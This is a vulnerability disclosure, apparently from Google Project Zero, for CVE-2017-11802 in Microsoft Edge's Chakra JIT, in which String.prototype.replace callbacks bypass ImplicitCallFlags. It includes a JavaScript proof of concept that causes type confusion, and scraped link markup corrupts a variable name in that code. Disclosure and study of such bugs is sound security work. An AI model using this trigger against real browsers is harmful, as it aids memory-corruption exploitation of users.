The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.
6c4259839de11f0d96f33fa01fc2246725c92d13a8e640c34e3ea19ed893ffcd
Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags
CVE-2017-11802
The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.
The PoC shows that it can result in type confusion.
PoC:
function main() {
let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
arr[2] = 1.1;
arr[3] = 1.1;
}
let <a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a> = () => '0';
for (var i = 0; i < 0x1000; i++)
opt(<a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a>);
opt(() => {
arr[0] = {};
return '0';
});
print(arr[1]);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt